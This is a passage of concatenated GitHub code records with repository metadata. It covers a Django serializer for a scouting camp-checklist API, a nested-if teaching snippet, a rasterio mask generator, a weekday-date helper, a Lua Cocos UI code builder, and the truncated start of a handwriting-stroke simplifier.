LinkedParticipantCookCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_participant_leader_check():\n value = LinkedParticipantLeaderCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_participant_responsible_check():\n value = LinkedParticipantResponsibleCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_participant_adult_check():\n value = LinkedParticipantAdultCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_participant_check():\n value = LinkedParticipantCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_file_upload_check():\n value = LinkedFileUploadCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_comment_check():\n value = LinkedCommentCheckSerializer.get_value(\n check, permission_granted)\n elif check.parent.check_type.is_number_check():\n value = LinkedNumberCheckSerializer.get_value(\n check, permission_granted)\n else:\n value = check.value\n\n self._state = (\n CheckState.CHECKED\n if (obj.check_state == CheckState.CHECKED or not check.is_required_for_validation())\n else CheckState.UNCHECKED\n )\n\n return value\n\n def get_state(self, obj: LinkedCheck):\n return self._state\n\n def to_internal_value(self, data: dict) -> dict:\n pk = data.get(\"id\", None)\n if id and len(data.keys()) == 1:\n linked_check = LinkedCheck.objects.safe_get(id=pk)\n if linked_check:\n check = linked_check.get_value_type()\n if check:\n return check\n\n return super().to_internal_value(data)\n\n def to_representation(self, obj: LinkedCheck) -> dict:\n if obj.is_archived:\n return None\n\n data = super().to_representation(obj)\n\n data[\"readable_name\"] = obj.readable_name\n\n return data\n\n\nclass LinkedSimpleCheckSerializer(LinkedCheckSerializer):\n value = serializers.ChoiceField(\n choices=CheckState.choices, default=CheckState.UNCHECKED\n )\n\n class Meta:\n model = LinkedSimpleCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedSimpleCheck, permission_granted: bool = True) -> dict:\n return obj.value\n\n @staticmethod\n def count_values(obj: LinkedSimpleCheck) -> int:\n return 1\n\n\nclass LinkedDateCheckSerializer(LinkedCheckSerializer):\n class Meta:\n model = LinkedDateCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedDateCheck, permission_granted: bool = True) -> dict:\n return obj.value\n\n @staticmethod\n def count_values(obj: LinkedDateCheck) -> int:\n return 1\n\n\nclass LinkedDurationCheckSerializer(LinkedCheckSerializer):\n\n start_date = DatetypeAwareDateSerializerField(required=True)\n end_date = DatetypeAwareDateSerializerField(required=True)\n\n class Meta:\n model = LinkedDurationCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedDurationCheck, permission_granted: bool = True) -> dict:\n data = dict()\n\n data[\"start_date\"] = obj.start_date\n data[\"end_date\"] = obj.end_date\n\n return data\n\n @staticmethod\n def count_values(obj: LinkedDurationCheck) -> int:\n return 2\n\n def validate(self, obj: dict) -> dict:\n start_date = obj.get(\"start_date\", None)\n end_date = obj.get(\"end_date\", None)\n\n if not start_date or not end_date:\n raise ValidationError(\"Start date and end date are required\")\n\n if start_date > end_date:\n raise ValidationError(\n \"Start date ({}) must come after end date ({})\".format(\n start_date, end_date\n )\n )\n\n return obj\n\n\nclass LinkedLocationCheckSerializer(LinkedCheckSerializer):\n locations = LinkedLocationSerializer(many=True)\n\n class Meta:\n model = LinkedLocationCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedLocationCheck, permission_granted: bool = True) -> dict:\n data = dict()\n\n if obj.has_value():\n data[\"center_latitude\"] = obj.center_latitude\n data[\"center_longitude\"] = obj.center_longitude\n data[\"zoom\"] = obj.zoom\n\n if permission_granted:\n data[\"locations\"] = LinkedLocationSerializer(\n obj.locations, many=True).data\n data[\"data_count\"] = obj.locations.count()\n else:\n data[\"locations\"] = []\n else:\n data[\"locations\"] = []\n\n return data\n\n @staticmethod\n def count_values(obj: LinkedLocationCheck) -> int:\n return obj.locations.count() if obj.parent.is_multiple else 1\n\n\nclass LinkedCampLocationCheckSerializer(LinkedCheckSerializer):\n locations = LinkedLocationSerializer(many=True)\n\n class Meta:\n model = LinkedLocationCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedLocationCheck, permission_granted: bool = True) -> List[dict]:\n data = LinkedLocationCheckSerializer.get_value(obj, permission_granted)\n\n data[\"is_camp_location\"] = True\n\n return data\n\n @staticmethod\n def count_values(obj: LinkedLocationCheck) -> int:\n return LinkedLocationCheckSerializer.count_values(obj)\n\n\nclass LinkedParticipantCheckSerializer(LinkedCheckSerializer):\n participant_check_type = serializers.ChoiceField(\n choices=ParticipantType.choices, default=ParticipantType.PARTICIPANT\n )\n participants = VisumParticipantSerializer(many=True)\n\n class Meta:\n model = LinkedParticipantCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedParticipantCheck, permission_granted: bool = True) -> List[dict]:\n data = {}\n\n if obj.has_value():\n data[\"participant_check_type\"] = obj.participant_check_type\n\n if permission_granted:\n data[\"participants\"] = VisumParticipantSerializer(\n obj.participants.all(), many=True\n ).data\n else:\n data[\"participants\"] = []\n\n data[\"data_count\"] = LinkedParticipantCheckSerializer.count_values(\n obj)\n\n return data\n\n @staticmethod\n def count_values(obj: LinkedParticipantCheck) -> int:\n return obj.participants.count() if obj.parent.is_multiple else 1\n\n\nclass LinkedParticipantMemberCheckSerializer(LinkedCheckSerializer):\n\n participants = VisumParticipantSerializer(many=True)\n\n class Meta:\n model = LinkedParticipantCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedParticipantCheck, permission_granted: bool = True) -> List[dict]:\n data = LinkedParticipantCheckSerializer.get_value(\n obj, permission_granted)\n\n data[\"participant_check_type\"] = ParticipantType.MEMBER\n\n return data\n\n @staticmethod\n def count_values(obj: LinkedParticipantCheck) -> int:\n return LinkedParticipantCheckSerializer.count_values(obj)\n\n\nclass LinkedParticipantCookCheckSerializer(LinkedCheckSerializer):\n\n participants = VisumParticipantSerializer(many=True)\n\n class Meta:\n model = LinkedParticipantCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedParticipantCheck, permission_granted: bool = True) -> List[dict]:\n data = LinkedParticipantCheckSerializer.get_value(\n obj, permission_granted)\n\n data[\"participant_check_type\"] = ParticipantType.COOK\n\n return data\n\n @staticmethod\n def count_values(obj: LinkedParticipantCheck) -> int:\n return LinkedParticipantCheckSerializer.count_values(obj)\n\n\nclass LinkedParticipantLeaderCheckSerializer(LinkedCheckSerializer):\n\n participants = VisumParticipantSerializer(many=True)\n\n class Meta:\n model = LinkedParticipantCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedParticipantCheck, permission_granted: bool = True) -> List[dict]:\n data = LinkedParticipantCheckSerializer.get_value(\n obj, permission_granted)\n\n data[\"participant_check_type\"] = ParticipantType.LEADER\n\n return data\n\n @staticmethod\n def count_values(obj: LinkedParticipantCheck) -> int:\n return LinkedParticipantCheckSerializer.count_values(obj)\n\n\nclass LinkedParticipantResponsibleCheckSerializer(LinkedCheckSerializer):\n\n participants = VisumParticipantSerializer(many=True)\n\n class Meta:\n model = LinkedParticipantCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedParticipantCheck, permission_granted: bool = True) -> List[dict]:\n data = LinkedParticipantCheckSerializer.get_value(\n obj, permission_granted)\n\n data[\"participant_check_type\"] = ParticipantType.RESPONSIBLE\n\n return data\n\n @staticmethod\n def count_values(obj: LinkedParticipantCheck) -> int:\n return LinkedParticipantCheckSerializer.count_values(obj)\n\n\nclass LinkedParticipantAdultCheckSerializer(LinkedCheckSerializer):\n\n participants = VisumParticipantSerializer(many=True)\n\n class Meta:\n model = LinkedParticipantCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedParticipantCheck, permission_granted: bool = True) -> List[dict]:\n data = LinkedParticipantCheckSerializer.get_value(\n obj, permission_granted)\n\n data[\"participant_check_type\"] = ParticipantType.ADULT\n\n return data\n\n @staticmethod\n def count_values(obj: LinkedParticipantCheck) -> int:\n return LinkedParticipantCheckSerializer.count_values(obj)\n\n\nclass LinkedFileUploadCheckSerializer(LinkedCheckSerializer):\n value = PersistedFileSerializer(many=True)\n\n class Meta:\n model = LinkedFileUploadCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedFileUploadCheck, permission_granted: bool = True) -> list:\n return PersistedFileSerializer(obj.value.all(), many=True).data\n\n @staticmethod\n def count_values(obj: LinkedFileUploadCheck) -> int:\n return 1\n\n\nclass LinkedCommentCheckSerializer(LinkedCheckSerializer):\n value = OptionalCharSerializerField()\n\n class Meta:\n model = LinkedCommentCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedCommentCheck, permission_granted: bool = True) -> dict:\n # logger.debug(\"hm %s\", str(obj))\n return obj.value\n\n @staticmethod\n def count_values(obj: LinkedCommentCheck) -> int:\n return 1\n\n\nclass LinkedNumberCheckSerializer(LinkedCheckSerializer):\n value = OptionalIntegerSerializerField()\n\n class Meta:\n model = LinkedNumberCheck\n fields = \"__all__\"\n\n @staticmethod\n def get_value(obj: LinkedNumberCheck, permission_granted: bool = True) -> dict:\n # logger.debug(\"hm %s\", str(obj))\n return obj.value\n\n @staticmethod\n def count_values(obj: LinkedNumberCheck) -> int:\n return 1\n","repo_name":"ScoutsGidsenVL/kampvisum-backend","sub_path":"scouts_kampvisum_api/apps/visums/serializers/linked_check_serializer.py","file_name":"linked_check_serializer.py","file_ext":"py","file_size_in_byte":14883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40550134599","text":"#nested if\n\n#we can have if statement inside if statement, this is called nestedif.\n\na=55\nb=99\nif a>b:\n print(\"a grater than b\")\n if b>a:\n print(\"b grater than a\")\nelse:\n print(\"both are equal\")","repo_name":"classpython2020/PythonClassOct2022","sub_path":"Python_class/Conditional_statements/nestedif.py","file_name":"nestedif.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5128373306","text":"import os, glob\nimport rasterio\nimport numpy as np\nimport geopandas as gpd\nimport rasterio.features\nfrom tqdm.notebook import tqdm\n\ndef create_mask_all(img_path, shp_path, list_name_object, property_name, out_path_mask, gen_mask_unique = False, value_unique = 255):\n \"\"\"\n property_name: day la ten truong ma chua cac doi tuong\n \"\"\"\n with rasterio.open(img_path) as src:\n meta = src.meta\n height, width = src.height, src.width\n tr = src.transform\n crs_img = src.crs\n df = gpd.read_file(shp_path)\n df['valu'] = 0\n # check epsg\n if df.crs.to_string() != crs_img.to_string():\n df = df.to_crs(epsg=str(crs_img.to_epsg()))\n\n # check so luong class\n list_object_in_field = np.unique(df[property_name])\n print(f'check {list_name_object} is subset {list_object_in_field}')\n if set(list_name_object).issubset(list_object_in_field):\n i = 0\n for class_name in list_name_object:\n i+=1\n if class_name in list_object_in_field:\n df.loc[df[property_name] == class_name, 'valu']= i\n else:\n continue\n\n shapes = df[['geometry', 'valu']]\n shapes = list(map(tuple, shapes.values))\n mask = rasterio.features.rasterize(shapes, out_shape=(height, width), transform=tr)\n meta.update({ 'count': 1, \n 'nodata': 0,\n 'dtype': 'uint8'\n })\n if gen_mask_unique:\n mask[mask!=0] = 1\n mask = mask*value_unique\n with rasterio.open(out_path_mask, 'w', **meta) as dst:\n dst.write(np.array([mask])) \n else:\n print('roi vao exception')\n print(list_object_in_field)\n print(list_name_object)\n pass\n\n \nif __name__ =='__main__':\n img_path = r\"E:\\WORK\\Change_detection_Dubai\\Data\\image\\KHALIFASAT_JUN2020.tif\"\n shp_path = r\"E:\\WORK\\Change_detection_Dubai\\Data\\label\\Training_Sample_V3.shp\"\n out_dir = r\"E:\\WORK\\Change_detection_Dubai\\Data\\mask_building_change\"\n os.makedirs(out_dir, exist_ok=True)\n list_name_object = ['Building Demolition', 'New Building', 'Rooftop Change', 'Existing Building Extension']\n property_name = 'Chng_Type'\n\n \n out_path_mask = os.path.join(out_dir, os.path.basename(img_path))\n create_mask_all(img_path, shp_path, list_name_object, property_name, out_path_mask, gen_mask_01=True)\n\n\n\n","repo_name":"anhbn995/GOGOOK","sub_path":"ALL_CODE/WorkSpaceDucAnh/Processing/ProcessingShape/build_shape_by_class.py","file_name":"build_shape_by_class.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8700147147","text":"from datetime import date\nfrom dateutil import parser\nfrom dateutil.rrule import *\n\nTODAY = date(year=2018, month=11, day=29)\n\n\ndef get_hundred_weekdays(start_date=TODAY):\n \"\"\"Return a list of hundred date objects starting from\n start_date up till 100 weekdays later, so +100 days\n skipping Saturdays and Sundays\"\"\"\n dates = list(\n rrule(DAILY,\n count=100,\n dtstart=start_date,\n byweekday=(MO, TU, WE, TH, FR)))\n return [parser.parse(str(d)).date() for d in dates]","repo_name":"syurskyi/Python_Topics","sub_path":"125_algorithms/_examples/_algorithms_challenges/pybites/intermediate/147_100_week_date_range/save2_passed.py","file_name":"save2_passed.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"70896816804","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/3/25 7:03 PM\n# @Author : Joli\n# @Email : 99755349@qq.com\nimport math\nimport os\nimport re\nimport time\nfrom jonlin.utils import Log, FS\n\nlog = Log.Logger(__file__)\n\nVERSION = 6\nRE_COMMA_END = re.compile(',(\\s*?)$') # 行尾逗号\nRE_RAW_BEGIN = re.compile('\\[(=*?)\\[') # \"[==[\"\nRE_RAW_END = re.compile('\\](=*?)\\]\\)(\\s*?)$') # \"]==])\\n\"\nRE_SETNODE = re.compile(':setNode\\((.*?)\\)(\\s*?)$') # setNode()\n\nclass LuaCSBuilder:\n def __init__(self, flag_dangling=2, flag_hidden=1, flag_repeat=0):\n self._flag_dangling = flag_dangling\n self._flag_hidden = flag_hidden\n self._flag_repeat = flag_repeat\n self._cstree = CSTree()\n\n def build(self, src, dst):\n start_t = time.time()\n if os.path.isdir(src):\n self._build_dir(src, dst)\n elif os.path.isfile(src):\n self._build_lua(src, dst)\n log.i('build csui done, 耗时:%.2fs' % (time.time() - start_t))\n\n def _build_dir(self, src, dst):\n split_pos = len(src) + 1\n for (root, _, files) in os.walk(src):\n for name in files:\n if not name.endswith('.lua'):\n continue\n src_path = os.path.join(root, name)\n src_meta = os.stat(src_path)\n name = src_path[split_pos:]\n dst_path = os.path.join(dst, name)\n if os.path.isfile(dst_path):\n dst_meta = os.stat(dst_path)\n if math.floor(src_meta.st_mtime * 1000) != math.floor(dst_meta.st_mtime * 1000):\n continue # 文件未修改\n self._build_lua(src_path, dst_path)\n # shutil.copystat(src_path, dst_path)\n os.utime(dst_path, (src_meta.st_ctime, src_meta.st_mtime))\n\n def _build_lua(self, src, dst):\n log.i(src)\n self._cstree.input_init()\n with open(src, 'r', encoding='utf-8') as fp:\n line, comma_open = '', False\n for s in fp.readlines():\n if RE_COMMA_END.search(s):\n line += s.strip()\n comma_open = True\n continue\n if comma_open:\n line += s.strip()\n self._cstree.input_line(line)\n line, comma_open = '', False\n else:\n self._cstree.input_line(s)\n text = self._cstree.build(self._flag_dangling, self._flag_hidden, self._flag_repeat)\n if text is None:\n log.e('build text error:', src)\n else:\n FS.make_parent(dst)\n with open(dst, 'w', encoding='utf-8') as fp:\n fp.write(text)\n\nclass CSTree:\n EDGE_VAR = 'edgeEnabled'\n TAB_NAME = 'result'\n KEYWORDS = (TAB_NAME, EDGE_VAR, 'animation', 'root', 'layout', 'innerCSD', 'innerProject', 'localFrame', 'localLuaFile', 'luaCS')\n\n class CSNode:\n def __init__(self, name, create):\n self.name = name\n self.create = create\n self.parent = ''\n self.childs = set()\n self.config = []\n self.layout = []\n self.layout_enabled = None # 是否允许布局组件\n self.v_edge = None # vertical dege\n self.h_edge = None # horizontal dege\n self.visible = True\n self.opacity = None\n self.is_cell = None # scrollview cell\n self.inner_ui = None # innerCSD and innerProject\n self.inner_animate = None # innerProject.animation\n self.tolua_invokes = None # 'tolua.cast(%{widget}s:getVirtualRenderer(), \"cc.Label\"):setLineBreakWithoutSpace(true)'\n self.cascade_color = None\n self.cascade_opacity = None\n\n def is_edge(self):\n return (self.v_edge is not None) or (self.h_edge is not None)\n\n def is_hidden(self):\n return not self.visible or self.opacity == 0\n\n def is_container(self):\n if self.create.startswith('cc.Node'):\n return True\n if self.create.startswith('ccui.Layout'):\n return True\n return len(self.childs) > 0\n\n def add_tolua(self, s):\n if self.tolua_invokes is None:\n self.tolua_invokes = [s]\n else:\n self.tolua_invokes.append(s)\n\n def add_inner_anim(self, s):\n if self.inner_animate is None:\n self.inner_animate = [s]\n else:\n self.inner_animate.append(s)\n\n def build(self, flag_dangling, flag_hidden, flag_repeat):\n if flag_dangling > 0:\n self._check_dangling_node(flag_dangling)\n if flag_hidden > 0:\n self._check_hidden_node(flag_hidden)\n if flag_repeat > 0:\n self._check_repeat_node(flag_repeat)\n share_var, parent_vars = self._check_variables('_a')\n if len(parent_vars) > 99:\n log.w('local variable limit', len(parent_vars))\n return self._make_text(share_var, parent_vars)\n\n def _make_text(self, share_var, variables):\n s = ''\n s += 'local luaExtend = require \"LuaExtend\"\\n\\n'\n s += 'local luaCS = {}\\n\\n'\n s += 'function luaCS.create(%s)\\n' % self.EDGE_VAR\n # 加载资源\n for sf in sorted(self._sprframes):\n s += '\\tcc.SpriteFrameCache:getInstance():addSpriteFrames(\"' + sf + '\")\\n'\n s += '\\n'\n # 声明变量\n s += '\\tlocal ' + share_var + ', ' + (', '.join(variables)) + '\\n'\n # 初始化 table\n s += '\\tlocal %s = {}\\n' % self.TAB_NAME\n s += '\\tsetmetatable(%s, luaExtend)\\n' % self.TAB_NAME\n s += '\\n'\n # 生成配置\n for node in self._widgets:\n if node.name in self._anim_nodes:\n var = self.TAB_NAME + \"['\" + node.name + \"']\"\n elif node.name in variables:\n var = node.name\n else:\n var = share_var\n if node.parent in self._anim_nodes:\n parent = self.TAB_NAME + \"['\" + node.parent + \"']\"\n elif node.parent in variables:\n parent = node.parent\n else:\n parent = share_var\n s += self._make_node(node, var, parent)\n if self._animation:\n s += '\\n\\t--Create Animation\\n'\n for stat in self._animation:\n s += '\\t' + stat + '\\n'\n # 文件尾\n s += \"\\t\" + self.TAB_NAME + \"['root'] = \" + self._root + '\\n'\n s += '\\treturn %s\\n' % self.TAB_NAME\n s += 'end\\n\\n'\n s += 'return luaCS'\n return s\n\n def _make_node(self, node, var, parent):\n s = ''\n s += '\\t--Create ' + node.name + '\\n'\n if node.inner_ui:\n for text in node.inner_ui:\n s += '\\t' + text + '\\n'\n s += '\\t' + var + ' = ' + node.create + '\\n'\n s += '\\t' + var + (':setName(\"%s\")' % node.name) + '\\n'\n for expr in node.config:\n s += '\\t' + var + expr + '\\n'\n if node.layout and (node.layout_enabled or node.name == self._root):\n s += '\\tlayout = ccui.LayoutComponent:bindLayoutComponent(%s)\\n' % var\n for stat in node.layout:\n s += '\\tlayout' + stat + '\\n'\n s += self._make_mark(node, var)\n if node.parent:\n if node.is_cell:\n s += '\\t' + parent + (':pushBackCustomItem(%s)' % var) + '\\n'\n else:\n s += '\\t' + parent + (':addChild(%s)' % var) + '\\n'\n return s + '\\n'\n\n def _make_mark(self, node, var):\n s = ''\n if node.is_container():\n if node.cascade_color:\n s += '\\t%s:setCascadeColorEnabled(%s)\\n' % (var, node.cascade_color)\n if node.cascade_opacity:\n s += '\\t%s:setCascadeOpacityEnabled(%s)\\n' % (var, node.cascade_opacity)\n if node.tolua_invokes: # 'tolua.cast(%(widget)s:getVirtualRenderer(), \"cc.Label\"):setLineBreakWithoutSpace(true)'\n for stat in node.tolua_invokes:\n s += '\\t' + (stat % {'widget': var}) + '\\n'\n if node.inner_animate:\n s += '\\tif nil ~= innerProject.animation then\\n'\n for stat in node.inner_animate:\n if stat.startswith('innerProject.'):\n s += '\\t\\t' + stat + '\\n' # 'innerProject.animation:setTimeSpeed(1.0000)'\n else:\n # %(widget)s.animation = innerProject.animation\n # %(widget)s:runAction(innerProject.animation)\n s += '\\t\\t' + var + stat + '\\n'\n s += '\\tend\\n'\n if node.is_edge() and (node.parent == self._root):\n s += '\\tif %s then\\n' % self.EDGE_VAR\n if node.h_edge is not None:\n s += '\\t\\tCcFuns.csuiEdgeH(%s, %s)\\n' % (var, node.h_edge)\n if node.v_edge is not None:\n s += '\\t\\tCcFuns.csuiEdgeV(%s, %s)\\n' % (var, node.v_edge)\n s += '\\tend\\n'\n if node.name.startswith('EFFECT_'):\n args = node.name.split('_')\n s += '\\tCcFuns.csuiFlash(%s, %s)\\n' % (var, ', '.join(args[1:]))\n if node.name.startswith('REDDOT_'):\n args = node.name.split('_')\n s += '\\tCcFuns.csuiRedDot(%s, %s)\\n' % (var, ', '.join(args[1:]))\n return s\n\n def _check_variables(self, sharevar):\n variables = ['layout']\n if self._has_inner:\n variables.append('innerCSD')\n variables.append('innerProject')\n if self._animation:\n variables.append('localFrame')\n for node in self._widgets:\n if node.childs: # node is container\n if node.name not in variables:\n variables.append(node.name)\n while True:\n if sharevar not in variables:\n break\n sharevar += '_'\n return sharevar, variables\n\n def _check_dangling_node(self, flag_dangling):\n array = set()\n for node in self._widgets:\n if not node.parent and node.name != self._root:\n array.add(node)\n if flag_dangling == 1:\n for node in array:\n log.w('dangling node:', node.name)\n elif flag_dangling == 2:\n self._erase(array)\n\n def _check_hidden_node(self, flag_hidden):\n array = set()\n for node in self._widgets:\n if node.is_hidden():\n array.add(node)\n for son in node.childs:\n array.add(self._find_node(son, node.name))\n if flag_hidden == 1:\n for node in array:\n log.w('hidden node:', node.name)\n elif flag_hidden == 2:\n self._erase(array)\n\n def _check_repeat_node(self, flag_repeat):\n array = set()\n for i in range(len(self._widgets)):\n node = self._widgets[i]\n for j in range(i + 1, len(self._widgets)):\n other = self._widgets[j]\n if node.name == other.name and node.parent == other.parent:\n array.add(node)\n break\n if flag_repeat == 1:\n for node in array:\n log.w('dunplicate node:', node.name)\n elif flag_repeat == 2:\n self._erase(array)\n\n def _erase(self, array):\n for node in array:\n self._widgets.remove(node)\n\n def input_init(self):\n self._nline = 0\n self._input = False\n\n def input_line(self, s):\n self._nline += 1\n if s.startswith('--'):\n return\n if s.startswith(\"setmetatable(result,\"):\n self._onstart()\n return\n if s.startswith(\"result['root'] = \"):\n self._onclose(s)\n return\n if not self._input:\n return\n if self._in_animate > 0:\n self._onanimate(s)\n return\n if s.startswith(\"local \"):\n self._onvar(s)\n return\n if self._is_result_token(s):\n self._onsub(s)\n else:\n self._onrow(s)\n\n def _onstart(self):\n self._root = None\n self._widgets = []\n self._sprframes = set()\n self._animation = []\n self._in_animate = 0\n self._anim_nodes = set()\n self._inner_csd = []\n self._has_inner = False\n self._in_rawstr = 0\n self._rawstring = ''\n self._input = True\n\n def _onclose(self, s):\n self._root = self._get_node_name(s[s.rfind('=') + 1:].strip())\n self._widgets.reverse()\n if len(self._animation) < 5:\n self._animation = None\n self._input = False\n\n def _onanimate(self, s):\n self._in_animate += 1\n if self._in_animate == 2:\n return # 跳过第二行\n s = s.strip()\n if RE_SETNODE.search(s):\n left = s.rfind('(')\n name = self._get_node_name(s[left+1:-1])\n self._anim_nodes.add(name)\n s = s[0:left] + \"(\" + self.TAB_NAME + \"['\" + name + \"'])\"\n self._animation.append(s)\n\n def _onvar(self, s):\n assign = self._scan_create(s, 6)\n if assign is None:\n log.e('unexpected local variable', s)\n return\n name = s[6:assign].strip()\n create = s[assign+1:].strip()\n self._oncreate(name, create)\n\n def _onsub(self, s):\n assign = self._scan_create(s, 8)\n if assign is None:\n self._onrow(s)\n return\n name = self._get_subkey(s[0:assign])\n if name == 'animation':\n self._in_animate += 1\n self._animation.append(s.strip())\n return\n create = s[assign+1:].strip()\n self._oncreate(name, create)\n\n def _oncreate(self, name, create):\n node = self.CSNode(name, create)\n if self._inner_csd:\n node.inner_ui = self._inner_csd\n self._inner_csd = []\n self._widgets.insert(0, node)\n\n def _onrow(self, s):\n if self._in_rawstr > 0 or RE_RAW_BEGIN.search(s):\n self._onrstr(s)\n return\n if not s.isspace():\n self._onstat(s.strip())\n\n # raw string\n def _onrstr(self, s):\n self._rawstring += s\n if not RE_RAW_END.search(s):\n self._in_rawstr += 1\n return\n s = self._rawstring\n self._rawstring = ''\n self._in_rawstr = 0\n self._onstat(s.strip())\n\n def _onstat(self, s):\n if s.startswith('layout') and self._hook_layout(s):\n return\n if s.startswith('cc.SpriteFrameCache:getInstance():addSpriteFrames'):\n self._sprframes.add(s[51:-2])\n return\n if s.startswith('innerCSD = require('):\n self._inner_csd.append(s)\n return\n if s.startswith('innerProject = '):\n self._inner_csd.append(s.replace('callBackProvider', self.EDGE_VAR))\n # self._inner_csd.append(s.replace('callBackProvider', ''))\n return\n if s.find('innerProject.animation') != -1:\n self._hook_inner_anim(s)\n return\n if s.startswith('tolua.'):\n self._hook_tolua(s)\n return\n self._hook_prop(s)\n\n def _hook_prop(self, s):\n colon_pos = self._find_colon(s)\n if colon_pos is None:\n log.e('cannot found colon in statement', s)\n return\n expr = s[colon_pos:]\n name = self._get_node_name(s[0:colon_pos])\n node = self._find_node(name)\n if node is None:\n log.e('cannot found widget:' + name + ' -- ' + s)\n else:\n self._hook_node_expr(node, expr)\n\n def _hook_node_expr(self, node, expr):\n func = expr[1:]\n if func.startswith('setTag'):\n return\n if func.startswith('setName'):\n if node.name != self._get_args(func)[1:-1]:\n log.e('unexpected widget name:' + ' -- %s%s' % (node.name, expr))\n return\n if func.startswith('setCascadeColorEnabled'):\n node.cascade_color = self._get_args(func)\n return\n if func.startswith('setCascadeOpacityEnabled'):\n node.cascade_opacity = self._get_args(func)\n return\n if func.startswith('addChild') or func.startswith('pushBackCustomItem'):\n son_name = self._get_node_name(self._get_args(func))\n son_node = self._find_node(son_name)\n if son_node is None:\n log.e('cannot found child:' + son_name + ' -- %s%s' % (node.name, expr))\n else:\n son_node.is_cell = (func == 'pushBackCustomItem')\n son_node.parent = node.name\n node.childs.add(son_name)\n return\n if func.startswith('setOpacity'):\n node.opacity = int(self._get_args(func))\n elif func.startswith('setVisible'):\n node.visible = bool(self._get_args(func))\n elif func.startswith('setLayoutComponentEnabled'):\n node.layout_enabled = bool(self._get_args(func))\n node.config.append(expr)\n\n def _hook_layout(self, s):\n expr = s[6:]\n if expr.startswith(' =') or expr.startswith('='):\n # parentheses = s.rfind('(')\n # s = s[0:parentheses] + '%(widget)s)'\n # node.layout.append(s)\n return True # layout = ccui.LayoutComponent:bindLayoutComponent(%(widget)s)\n if expr.startswith(':'):\n func = expr[1:]\n node = self._last_node()\n if func.startswith('setVerticalEdge'):\n node.v_edge = int(self._get_args(func))\n elif func.startswith('setHorizontalEdge'):\n node.h_edge = int(self._get_args(func))\n node.layout.append(expr)\n return True\n\n def _hook_inner_anim(self, s):\n node = self._last_node()\n if node.inner_ui is None:\n log.e('last widget no innerCSD -- ', s)\n return\n if not s.startswith('innerProject.') or not s.startswith('innerProject:'):\n if s.find('=') != -1:\n s = s[s.find('.'):] # %(widget)s.animation = innerProject.animation\n elif s.find('runAction') != -1:\n s = s[s.find(':'):] # %(widget)s:runAction(innerProject.animation)\n node.add_inner_anim(s)\n self._has_inner = True\n\n def _hook_tolua(self, s):\n func = s[6:]\n if func.startswith('cast('):\n colon_pos = s.find(':', 10)\n name = self._get_node_name(s[11:colon_pos])\n node = self._find_node(name)\n if node is None:\n log.e('cannot found widget:' + name + ' -- ' + s)\n return\n s = s[0:11] + '%(widget)s' + s[colon_pos:]\n node.add_tolua(s)\n else:\n log.w('unexpected tolua api:', s)\n\n def _get_node_name(self, token):\n return token if not self._is_result_token(token) else self._get_subkey(token)\n\n def _scan_create(self, s, start):\n assignment = s.find('=', start)\n if -1 != assignment:\n if self._find_colon(s[0:assignment]) is None: # 排除括号内参数的等于号\n return assignment\n\n @staticmethod\n def _find_colon(s):\n p = s.find(':')\n if -1 != p:\n return p\n p = s.find('.')\n if -1 != p:\n return p\n\n @staticmethod\n def _get_subkey(sub, quotes=(\"'\", '\"')):\n s, b = '', False\n for c in sub:\n if b:\n if c in quotes:\n return s\n s += c\n elif c in quotes:\n b = True\n\n @staticmethod\n def _is_result_token(s):\n return s.startswith('result[')\n\n @staticmethod\n def _get_args(func):\n return func[func.rfind('(')+1:func.rfind(')')]\n\n def _find_node(self, name, parent=None):\n for node in self._widgets:\n if node.name == name and (parent is None or parent == node.parent):\n return node\n\n def _last_node(self):\n return self._widgets[0]","repo_name":"JoliChen/py-tool","sub_path":"easy2/cl/make_csui/scripts/MakeCSUI.py","file_name":"MakeCSUI.py","file_ext":"py","file_size_in_byte":20125,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"19762352596","text":"# coding: utf8\n'''\nCreated on 2012/12/05\n\n@author: k_morishita\n'''\nfrom web.models import HWData\nimport json\nimport random\nimport math\n\ndef convert_strokes_simply(hwdata, n_direction=8, dist_threshold=0.03):\n \"\"\"\n \n @param hwdata: HWData\n @return Simplified HWData Model \n \"\"\"\n sdata = HWData.copy(hwdata)\n new_strokes = []\n for stroke in json.loads(sdata.strokes):\n ns = []\n mid_points = []\n new_strokes.append(ns)\n for point in stroke:\n if len(ns) == 0:\n ns.append(point)\n else:\n for mp in mid_points:\n d = distance_point_and_line(ns[-1], point, mp, sdata.width, sdata.height)\n if d > dist_threshold:\n ns.append(mid_points[-1])\n mid_points = []\n break\n mid_points.append(point)\n if calc_distance(ns[-1], mid_points[-1], sdata.width, sdata.height) >= dist_threshold:\n 